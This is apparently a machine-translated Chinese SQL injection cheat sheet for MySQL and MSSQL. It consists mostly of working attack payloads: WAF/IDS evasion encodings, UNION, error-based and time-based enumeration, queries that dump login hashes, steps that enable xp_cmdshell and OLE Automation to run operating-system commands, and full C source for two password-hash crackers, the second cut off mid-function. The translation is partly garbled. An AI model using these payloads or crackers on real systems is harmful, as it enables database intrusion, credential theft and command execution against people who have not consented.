MySQL容許你指定感嘆號後面的版本號。 註釋中的語法僅在版本大於或等於指定的版本號時執行。javascript
UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null-- x*/0,null--+ SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/); 第一個例子返回版本; 它使用了一個2列的聯合。 第二個例子演示瞭如何繞過WAF/IDS。
SELECT * FROM Users WHERE username = 0x61646D696E ---> Hex encoding. SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110) --> CHAR() Function.
09 水平標籤 0A 新的一行 0B 垂直標籤 0C 新頁面 0D 回車 A0 不間斷的空格 20 空格
Example: '%0A%09UNION%0CSELECT%A0NULL%20%23
28 ( 29 ) Example: UNION(SELECT(column)FROM(table))
20 Space 2B + 2D - 7E ~ 21 ! 40 @ Example: SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1)) tips: dual是一個可用於測試的虛擬表。
並避免檢測。 經過使用#或-
Example: 1'# AND 0-- UNION# I am a comment! SELECT@tmp:=table_name x FROM-- `information_schema`.tables LIMIT 1#
1'%23%0AAND 0--%0AUNION%23 I am a comment!%0ASELECT@tmp:=table_name x FROM--%0A`information_schema`.tables LIMIT 1%23
VERSION/**/%A0 (/*comment*/)
編碼有時能夠用於bypass WAF/IDS。sql
URL Encoding --> SELECT %74able_%6eame FROM information_schema.tables; Double URL Encoding --> SELECT %2574able_%256eame FROM information_schema.tables; Unicode Encoding --> SELECT %u0074able_%u6eame FROM information_schema.tables; Invalid Hex Encoding (ASP) --> SELECT %tab%le_%na%me FROM information_schema.tables;
INFORMATION_SCHEMA.TABLES Example: 空格 information_schema . tables 反引號 `information_schema`.`tables` 特定的代碼 /*!information_schema.tables*/ 替代名稱 information_schema.partitions information_schema.statistics information_schema.key_column_usage information_schema.table_constraints tips: 他的替代名稱可能取決於表中存在的主鍵。
AND,&& --邏輯AND = --分配一個值(做爲SET語句的一部分,或做爲UPDATE語句中的SET子句的一部分) : --=分配一個值 BETWEEN ... AND ... --檢查一個值是否在一個範圍內 BINARY --將字符串轉換爲二進制字符串 & --按位與 〜 --反轉位 | --按位或 ^ -- 按位XOR CASE --Case操做 DIV --整數除法 / --Division operator <=> -- NULL-safe等於運算符 = --等號運算符 >= --大於或等於運算符 > -- 大於運算符 IS NOT NULL -- NOT NULL值測試 不是根據布爾值來測試一個值 IS NULL --NULL值測試 IS --根據布爾值來測試一個值 << --Left shift <= -- 小於或等於 < -- 小於 LIKE -- 簡單的模式匹配 - -- 減號 %或MOD-- 模運算符 NOT BETWEEN ... AND ... -- 檢查一個值是否在一個範圍內 !=,<> -- 不等於運算符 NO LIKE -- 簡單模式匹配的否認 NOT REGEXP -- NOT REGEXP NOT , ! -- 否認值 || -- 或 +-- 加法運算符 REGEXP 使用正則表達式的REGEXP模式匹配 >> -- 右移 RLIKE -- REGEXP的同義詞 SOUNDS LIKE-- 比較聲音 * -- 乘法運算符 - -- 改變參數的符號 XOR -- 邏輯異或
null, \N true, false
在MySQL 4.1以前,由PASSWORD()函數計算的密碼散列長度爲16個字節。 這樣的哈希看起來像這樣:數據庫
PASSWORD('mypass') 6f8c114b58f2ce9e
從MySQL 4.1開始,PASSWORD()函數已被修改成產生一個更長的41字節散列值:
PASSWORD('mypass') *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4
和John the Ripper
都可以破解MySQL 3.x-6.x
這個工具是MySQL散列密碼的高速蠻力密碼破解工具。 它能夠在普通的PC上在幾個小時內爆破一個包含任何可打印的ASCII字符的8個字符的密碼。
/* This program is public domain. Share and enjoy. * * Example: * $ gcc -O2 -fomit-frame-pointer MySQLfast.c -o MySQLfast * $ MySQLfast 6294b50f67eda209 * Hash: 6294b50f67eda209 * Trying length 3 * Trying length 4 * Found pass: barf * * The MySQL password hash function could be strengthened considerably * by: * - making two passes over the password * - using a bitwise rotate instead of a left shift * - causing more arithmetic overflows */ #include <stdio.h> typedef unsigned long u32; /* Allowable characters in password; 33-126 is printable ascii */ #define MIN_CHAR 33 #define MAX_CHAR 126 /* Maximum length of password */ #define MAX_LEN 12 #define MASK 0x7fffffffL int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary) { int i, c; u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2; u32 newstate1, newstate2, newstate3; u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2]; u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3]; i = -1; sum = 7; state1_ary[0] = 1345345333L; state2_ary[0] = 0x12345671L; while (1) { while (i < stop) { i++; pass_ary[i] = MIN_CHAR; step_ary[i] = (state1_ary[i] & 0x3f) + sum; xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8); sum += MIN_CHAR; state1_ary[i+1] = state1_ary[i] ^ xor_ary[i]; state2_ary[i+1] = state2_ary[i] + ((state2_ary[i] << 8) ^ state1_ary[i+1]); } state1 = state1_ary[i+1]; state2 = state2_ary[i+1]; step = (state1 & 0x3f) + sum; xor1 = step*MIN_CHAR + (state1 << 8); xor2 = (state2 << 8) ^ state1; for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) { newstate2 = state2 + (xor1 ^ xor2); newstate1 = state1 ^ xor1; newstate3 = (targ2 - newstate2) ^ (newstate2 << 8); div = (newstate1 & 0x3f) + sum + c; diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK; if (diff % div != 0) continue; d = diff / div; if (d < MIN_CHAR || d > MAX_CHAR) continue; div = (newstate3 & 0x3f) + sum + c + d; diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK; if (diff % div != 0) continue; e = diff / div; if (e < MIN_CHAR || e > MAX_CHAR) continue; pass_ary[i+1] = c; pass_ary[i+2] = d; pass_ary[i+3] = e; return 1; } while (i >= 0 && pass_ary[i] >= MAX_CHAR) { sum -= MAX_CHAR; i--; } if (i < 0) break; pass_ary[i]++; xor_ary[i] += step_ary[i]; sum++; state1_ary[i+1] = state1_ary[i] ^ xor_ary[i]; state2_ary[i+1] = state2_ary[i] + ((state2_ary[i] << 8) ^ state1_ary[i+1]); } return 0; } void crack(char *hash) { int i, len; u32 targ1, targ2, targ3; int pass[MAX_LEN]; if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) { printf("Invalid password hash: %s\n", hash); return; } printf("Hash: %08lx%08lx\n", targ1, targ2); targ3 = targ2 - targ1; targ3 = targ2 - ((targ3 << 8) ^ targ1); targ3 = targ2 - ((targ3 << 8) ^ targ1); targ3 = targ2 - ((targ3 << 8) ^ targ1); for (len = 3; len <= MAX_LEN; len++) { printf("Trying length %d\n", len); if ( crack0(len-4, targ1, targ3, pass) ) { printf("Found pass: "); for (i = 0; i < len; i++) putchar(pass[i]); putchar('\n'); break; } } if (len > MAX_LEN) printf("Pass not found\n"); } int main(int argc, char *argv[]) { int i; if (argc <= 1) printf("usage: %s hash\n", argv[0]); for (i = 1; i < argc; i++) crack(argv[i]); return 0; }
pubs 在MSSQL 2005上不可用 model 在全部版本中均可用 msdb 在全部版本中均可用 tempdb 在全部版本中均可用 northwind 在全部版本中均可用 information_schema MSSQL 2000 或更高版本可用
/* -- C風格的評論
- -- SQL註釋
;%00 -- 空字節
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = ''; SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';
True if MSSQL version is 2008. SELECT * FROM Users WHERE id = '1' AND @@VERSION LIKE '%2008%'; tips: 輸出還將包含Windows操做系統的版本。 數據庫憑證 數據庫..Table master..syslogins, master..sysprocesses Columns name, loginame Current User user, system_user, suser_sname(), is_srvrolemember('sysadmin') Database Credentials SELECT user, password FROM master.dbo.sysxlogins Example: 返回當前用戶: SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID; 檢查當前用戶是不是admin: SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END); Database Names Database.Table master..sysdatabases Column name Current DB DB_NAME(i) Examples: SELECT DB_NAME(5); SELECT name FROM master..sysdatabases;
SERVERPROPERTY() 只對 MSSQL 2005 或更高版本有效
ORDER BY n+1; Example: sql語句: SELECT username, password, permission FROM Users WHERE id = '1'; 1' ORDER BY 1-- True 1' ORDER BY 2-- True 1' ORDER BY 3-- True 1' ORDER BY 4-- False - 得出只有三列 -1' UNION SELECT 1,2,3-- True tips: 讓數字一直增長會獲得一個錯誤的請求 如下內容可用於獲取當前查詢中的列。 GROUP BY / HAVING Example: sql語句: SELECT username, password, permission FROM Users WHERE id = '1'; 1' HAVING 1=1-- Column 'Users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. 1' GROUP BY username HAVING 1=1-- Column 'Users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. 1' GROUP BY username, password HAVING 1=1-- Column 'Users.permission' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. 1' GROUP BY username, password, permission HAVING 1=1-- No Error tips: 全部列都包括在內後,將不會返回任何錯誤。
UNION SELECT name FROM master..sysobjects WHERE xtype='U'
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables) AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))
Xtype ='U'用於用戶定義的表格。 您可使用「V」查看。
UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename')
AND SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns > 'A'
AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns) AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))
如下3個查詢將建立一個臨時表/列,並將全部用戶定義的表格插入到其中。 而後它將轉儲表內容並刪除該表完成。
AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END; 轉儲內容: AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB); 刪除表: AND 1=0; DROP TABLE TMP_DB; 一個更簡單的方法是從MSSQL 2005及更高版本開始。 XML函數path()做爲一個鏈接器,容許用1個查詢檢索全部表。: SELECT table_name %2b ', ' FROM information_schema.tables FOR XML PATH('') 你也能夠講你的查詢語句編碼: ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--
SELECT * FROM Users WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110)
SELECT CONCAT('a','a','a'); (SQL SERVER 2012) SELECT 'a'+'d'+'mi'+'n';
IF CASE Examples: IF 1=1 SELECT 'true' ELSE SELECT 'false'; SELECT CASE WHEN 1=1 THEN true ELSE false END;
WAITFOR DELAY 'time_to_pass'; WAITFOR TIME 'time_to_execute'; Example: IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
SELECT * FROM OPENROWSET('SQLOLEDB', '';'sa';'p4ssw0rd', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
EXEC master.dbo.xp_cmdshell 'cmd';
從MSSQL 2005及更高版本開始,xp_cmdshell在默認狀況下處於禁用狀態,但能夠經過如下查詢來激活:
EXEC sp_configure 'show advanced options', 1 EXEC sp_configure reconfigure EXEC sp_configure 'xp_cmdshell', 1 EXEC sp_configure reconfigure
DECLARE @execmd INT EXEC SP_OACREATE '', @execmd OUTPUT EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'
EXEC sp_configure 'show advanced options', 1 EXEC sp_configure reconfigure EXEC sp_configure 'OLE Automation Procedures', 1 EXEC sp_configure reconfigure
' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
' AND 1=1--sp_password Output: -- 'sp_password' was found in the text of this event. -- The text has been replaced with this comment for security reasons.
MSSQL 支持堆查詢
' AND 1=0 INSERT INTO ([column1], [column2]) VALUES ('value1', 'value2');
01 Start of Heading 02 Start of Text 03 End of Text 04 End of Transmission 05 Enquiry 06 Acknowledge 07 Bell 08 Backspace 09 Horizontal Tab 0A New Line 0B Vertical Tab 0C New Page 0D Carriage Return 0E Shift Out 0F Shift In 10 Data Link Escape 11 Device Control 1 12 Device Control 2 13 Device Control 3 14 Device Control 4 15 Negative Acknowledge 16 Synchronous Idle 17 End of Transmission Block 18 Cancel 19 End of Medium 1A Substitute 1B Escape 1C File Separator 1D Group Separator 1E Record Separator 1F Unit Separator 20 Space 25 22 " 28 ( 29 ) 5B [ 5D ] Examples: S%E%L%E%C%T%01column%02FROM%03table; A%%ND 1=%%%%%%%%1; UNION(SELECT(column)FROM(table)); SELECT"table_name"FROM[information_schema].[tables]; tips: 關鍵字之間的百分比符號只能在ASP(x)Web應用程序上使用。
01 - 20 Range 21 ! 2B + 2D - 2E . 5C \ 7E ~ Example: SELECT 1FROM[table]WHERE\1=\1AND\1=\1; tips: 反斜槓彷佛不適用於MSSQL 2000。
編碼有時能夠bypass WAF/IDS.
URL Encoding >>>> SELECT %74able_%6eame FROM information_schema.tables; Double URL Encoding SELECT %2574able_%256eame FROM information_schema.tables; Unicode Encoding >>>> SELECT %u0074able_%u6eame FROM information_schema.tables; Invalid Hex Encoding (ASP) >>>> SELECT %tab%le_%na%me FROM information_schema.tables; Hex Encoding >>>> ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);-- HTML Entities (Needs to be verified) %26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B
密碼以0x0100開始,0x以後的第一個字節是常量; 接下來的八個字節是散列鹽,其他的80個字節是兩個散列,前40個字節是密碼的區分大小寫,而第二個40字節是大寫字母。
Password Cracking
A Metasploit module for JTR can be found here.
MSSQL 2000 Password Cracker This tool is designed to crack Microsoft SQL Server 2000 passwords. ///////////////////////////////////////////////////////////////////////////////// // // SQLCrackCl // // This will perform a dictionary attack against the // upper-cased hash for a password. Once this // has been discovered try all case variant to work // out the case sensitive password. // // This code was written by David Litchfield to // demonstrate how Microsoft SQL Server 2000 // passwords can be attacked. This can be // optimized considerably by not using the CryptoAPI. // // (Compile with VC++ and link with advapi32.lib // Ensure the Platform SDK has been installed, too!) // ////////////////////////////////////////////////////////////////////////////////// #include <stdio.h> #include <windows.h> #include <wincrypt.h> FILE *fd=NULL; char *lerr = "\nLength Error!\n"; int wd=0; int OpenPasswordFile(char *pwdfile); int CrackPassword(char *hash); int main(int argc, char *argv[]) { int err = 0; if(argc !=3) { printf("\n\n*** SQLCrack *** \n\n"); printf("C:\\>%s hash passwd-file\n\n",argv[0]); printf("David Litchfield (\n"); printf("24th June 2002\n"); return 0; } err = OpenPasswordFile(argv[2]); if(err !=0) { return printf("\nThere was an error opening the password file %s\n",argv[2]); } err = CrackPassword(argv[1]); fclose(fd); printf("\n\n%d",wd); return 0; } int OpenPasswordFile(char *pwdfile) { fd = fopen(pwdfile,"r"); if(fd) return 0; else return 1; } int CrackPassword(char *hash) { char phash[100]=""; char pheader[8]=""; char pkey[12]=""; char pnorm[44]=""; char pucase[44]=""; char pucfirst[8]=""; char wttf[44]=""; char uwttf[100]=""; char *wp=NULL; char *ptr=NULL; int cnt = 0; int count = 0; unsigned int key=0; unsigned int t=0; unsigned int address = 0; unsigned char cmp=0; unsigned char x=0; HCRYPTPROV hProv=0; HCRYPTHASH hHash; DWORD hl=100; unsigned char szhash[100]=""; int len=0; if(strlen(hash) !=94) { return printf("\nThe password hash is too short!\n"); } if(hash[0]==0x30 && (hash[1]== 'x' || hash[1] == 'X')) { hash = hash + 2; strncpy(pheader,hash,4); printf("\nHeader\t\t: %s",pheader); if(strlen(pheader)!=4) return printf("%s",lerr); hash = hash + 4; strncpy(pkey,hash,8); printf("\nRand key\t: %s",pkey); if(strlen(pkey)!=8) return printf("%s",lerr); hash = hash + 8; strncpy(pnorm,hash,40); printf("\nNormal\t\t: %s",pnorm); if(strlen(pnorm)!=40) return printf("%s",lerr); hash = hash + 40; strncpy(pucase,hash,40); printf("\nUpper Case\t: %s",pucase); if(strlen(pucase)!=40) return printf("%s",lerr); strncpy(pucfirst,pucase,2); sscanf(pucfirst,"%x",&cmp); } else { return printf("The password hash has an invalid format!\n"); } printf("\n\n Trying...\n"); if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0)) { if(GetLastError()==NTE_BAD_KEYSET) { // KeySet does not exist. So create a new keyset if(!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_NEWKEYSET )) { printf("FAILLLLLLL!!!"); return FALSE; } } } while(1) { // get a word to try from the file ZeroMemory(wttf,44); if(!fgets(wttf,40,fd)) return printf("\nEnd of password file. Didn't find the password.\n"); wd++; len = strlen(wttf); wttf[len-1]=0x00; ZeroMemory(uwttf,84); // Convert the word to UNICODE while(count < len) { uwttf[cnt]=wttf[count]; cnt++; uwttf[cnt]=